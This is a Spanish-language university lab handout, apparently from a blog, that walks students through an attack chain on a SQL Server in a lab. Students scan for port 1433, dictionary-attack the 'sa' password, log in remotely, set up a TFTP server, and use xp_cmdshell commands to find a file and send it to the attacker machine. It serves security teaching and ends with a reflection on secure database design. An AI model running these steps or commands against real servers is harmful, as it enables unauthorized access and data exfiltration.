Practica 1 ataque a una B.D en SQL server



Práctica No. 1
SQL Server (Valor 10 puntos TRABAJO ENTREGABLE)

Ø Objetivos
Ø  Identificar la presencia de un servidor SQL Server mediante el uso de software de scanner de puertos.

Ø  Efectuar un ataque por diccionario para encontrar la contraseña de la cuenta “sa”.

Ø  Conectarse y controlar en forma remota el servidor.

Ø  Instalar un servidor TFTP en la computadora atacante.

Ø  Ejecutar comandos del sistema operativo desde SQL Server.

Introducción:

Basado en pruebas de infiltración reales que hemos efectuado sobre nuestros clientes desde internet. La metodología también es muy similar a la usada para hackear a Microsoft cuando le robaron parte del código fuente de Windows XP. En este incidente, uno de los programadores de bases de datos tenía una contraseña sencilla en su equipo, que fue explotada por los atacantes como se describe a continuación.

Ø Material y equipo necesario
v 1Computadora con windows
v Conectar a la red de internet


Ø  Metodología

Realizamos.
 
 
 
 
 
 
Fase 1.
En este ejercicio, se instalará y ejecutará el software Superscan para identificar el puerto TCP abierto que indica la presencia de un servidor SQL activo en la red.

Tarea
Pasos Detallados
1.      Instalación de Superscan.
a.      Ejecute Windows

b.      Inserte la memoria USB.

c.       Abra el explorador de archivos, y navegue a la ubicación del software Superscan

\HERRAMIENTAS SQL

d.      Ejecute el programa instalador de superscan,  superscan.exe, aceptando las opciones por default que presenta el asistente.
2.      Scanear el servidor remoto
a.      Indique la dirección IP del servidor que se desea analizar: 192.168.1.100. Esta dirección debe ser la misma en los campos IP Start  y Stop.
En Scan Type, seleccione All list ports from 1-5000.

b.      Inicie el escaneo del servidor presionando el botón Start.
c.       Compruebe que el scanner identifica correctamente el puerto 1433 como servicio SQL
Fase 2.
En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para encontrar la contraseña de acceso de la cuenta administrativa “sa”.

Tarea
Pasos Detallados
1.      Ejecutar SQLDict.
a.      Ejecute el programa sqldict.exe desde el USB

b.      En el campo Target server IP, introduzca 192.168.1.100

c.       En el campo Target Account, asegúrese que se encuentra sa por default.

d.      Seleccione Load Password File

e.      Navegue a su USB, localice y seleccione el archivo passwords.txt.

Nota: el archivo Passwords.txt  contiene una selección de las palabras mas frecuentes que son utilizadas como contraseñas de acceso para diversos servicios. Este archivo pertenece al CD “Openwall Wordlist Collection”, disponible en http://openwall.net

f.        Seleccione Start. Después de algunos minutos, deberá aparecer la contraseña.





Fase 3.
En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener el control total del servidor de bases de datos, en forma remota y con privilegios administrativos.

Tarea
Pasos Detallados
1.      Configurar la herramienta Enterprise Manager, conectarse al servidor y controlarlo en forma remota.
a.      Ejecute la herramienta administrativa Management Studio en el menú Start | Programs | Microsoft SQL Server 2005 | SQL Server Management Studio Express

b.      En Nombre de servidor, introduzca 192.168.1.100

c.       En Autenticación, seleccione Autenticación de SQL Server. Introduzca la cuenta sa, con la contraseña que crackeo en el ejercicio anterior. Haga click en Conectar.


Fase 4.
En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema operativo Windows contiene un cliente TFTP, pero no el componente servidor.

Tarea
Pasos Detallados
1.      Instalar un servidor TFTP
a.      Inserte la memoria USB.

b.      Abra el explorador de Windows, y navegue a la ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL

c.       Ejecute el software instalador de TFTP Server, SolarWinds-TFTP-Server.exe, aceptando las opciones por default que presenta el asistente. Si le solicita el CD de instalación de Microsoft Office, presione Cancelar.

d.      En la opción File – Configure, seleccione la pestaña  Security, activando la opción “Transmit and Receive files”. Presione “OK”.



Fase 5.
En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir hacia la computadora atacante.

Tarea
Pasos Detallados
1.      Conectarse al servidor remoto
a.      En SQL Server Management Studio, selecciona Nueva consulta.

2.      Ejecutar el extended stored procedure xp_cmdshell para buscar y transferir un archivo hacia el hacker
a.      En la ventana de consultas, introduzca y ejecute el siguiente comando para localizar cualquier archivo de texto que usaremos como ejemplo.

xp_cmdshell ‘dir c:\*.txt /s’

b.      Active el servidor TFTP en la computadora atacante: menú Start | Programs | SolarWinds 2001 Standard Edition | File Transfer | TFTP Server.

c.       Transfiera el archivo encontrado hacia el equipo cliente, ejecutando el siguiente stored procedure:

xp_cmdshell ‘tftp –i 192.168.1.# PUT path’

Sustituya # por el número de estudiante que usted tiene asignado. Sustituya la palabra path por la ruta completa del archivo encontrado en el punto “a”. Si la ruta contiene espacios en blanco, necesita incluirla entre comillas “ ”.

Por ejemplo, si el archivo que desea transferir es c:\program files\test.txt, ejecute:

xp_cmdshell ‘tftp -i  192.168.1.# PUT “c:\program files\test.txt”’

d.      Verifique que el archive se transfirió hacia la computadora atacante, revisando el contenido del directorio c:\TFTP-root (el directorio que se configure por default para enviar y recibir archives por TFTP).






Reflexión

a. Como serán tus diseños y administración de las bases de datos, apartir de ahora. ¿Tendrás algunas consideraciones para implementarlas? ¿Cuáles?
____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
                    

Ø Sugerencias didácticas

v  Trabajo Individual
v  Consultar si lo desea en la red de internet


Ø Resultados

  • Explicar a detalle y anexe figuras que ilustren los resultados obtenidos (anexar)




Ø Bibliografía utilizada



Ø Conclusiones




Nombre del alumno ____________________________________

________________________________________________________
Firma, fecha y observaciones del profesor ______________________
 

No hay comentarios:

Publicar un comentario